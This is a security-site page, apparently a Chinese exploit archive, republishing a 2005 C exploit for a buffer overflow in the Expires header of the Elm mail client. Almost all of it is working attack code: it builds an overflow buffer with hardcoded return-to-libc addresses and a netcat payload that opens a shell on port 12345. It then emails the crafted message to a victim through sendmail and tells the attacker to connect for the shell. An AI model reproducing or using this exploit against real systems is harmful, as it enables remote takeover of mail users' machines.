首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Electronic Mail for UNIX (Elm) Expires Header Buffer Overflow Exploit
来源:c0ntex@open-security.org 作者:c0ntex 发布时间:2005-08-24  

Electronic Mail for UNIX (Elm) Expires Header Buffer Overflow Exploit


#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define BUFFER 83
#define EMAIL "tmpmail"
#define STRING "`nc -l -p 12345 -e /bin/sh`&##"
#define SYSLOC 0x42041e50
#define STRLOC 0x4001a207
#define EXTLOC 0x4202b0f0

char expire[]="\x45\x78\x70\x69\x72\x65\x73\x3A\x20";

int main(int argc, char **argv)
{
char buffer[BUFFER];
char *email = NULL;
char *user = NULL;
int i;
long extloc, sysloc, strloc;
FILE *fp;

if(argc != 2) {
puts("Usage: ./elmex <user@where.com>");
exit(EXIT_FAILURE);
}

if(strlen(argv[1]) > 50) {
puts("[-] Sorry, email address too long!");
exit(EXIT_FAILURE);
}

user = (char *)malloc(strlen(argv[1]));
if(!user) {
perror("malloc");
exit(EXIT_FAILURE);
}

email = EMAIL;

memset(user, '\0', strlen(argv[1]));
memcpy(user, argv[1], strlen(argv[1]));

puts("\nExploit for elm email client < 2.5.8 overflow in Expires field");
puts("Tested: Redhat on quiet a Sunday by c0ntex[at]open-security.org\n");

extloc = EXTLOC;
sysloc = SYSLOC;
strloc = STRLOC;

memset(buffer, '\0', BUFFER);
memcpy(buffer, expire, strlen(expire));

for(i = strlen(expire); i < 53; i++)
*(buffer+i) = 0x41;
for(i = 53; i < 57; i += 4)
*(long *)&buffer[i] = sysloc;
for(i = 57; i < 61; i++)
*(long *)&buffer[i] = extloc;
for(i = 61; i < 65; i += 4)
*(long *)&buffer[i] = strloc;

memcpy(&buffer[65], STRING, strlen(STRING));
buffer[BUFFER] = '\0';

puts("[-] Adding exploit buffer to email");

fp = fopen(email, "w");
if(!fp) {
perror("fopen"); free(user);
exit(EXIT_FAILURE);
}

fprintf(fp,
"From: User c0ntex <c0ntex@open-security.org> Sun Aug 21 13:37:00 2005\n"
"Return-Path: <c0ntex@localhost\n"
"Date: Sun, 21 Aug 2005 13:37:00 %s\n"
"Subject: Insecure?\n"
"To: %s\n"
"%s\n", STRING, user, buffer);
fclose(fp);

printf("[-] Emailing %s with malicious content\n", argv[1]);

if(system("/bin/cat ./tmpmail | /usr/sbin/sendmail -t") <0) {
perror("system"); free(user);
exit(EXIT_FAILURE);
}

puts("[-] Connect to system on port 12345 to get your shell\n");

if(unlink(EMAIL) <0)
perror("unlink");

free(user);

return EXIT_SUCCESS;
}



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·MyBB finduser Search SQL Injec
·Raising The Bar For Windows Ro
·Sun Solaris printd Daemon Remo
·Open DC hub Buffer Overflow
·ShixxNote Buffer Overflow
·WinAce Temporary File Handling
·The Lizard Cart CMS version 1.
·GTChat Remote Denial Of Servic
·Windows XP/2003 Picture and Fa
·Ventrilo Denial of Service
·WinRAR Buffer Overflow Vulnera
·Home Ftp Server Multiple Vulne
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved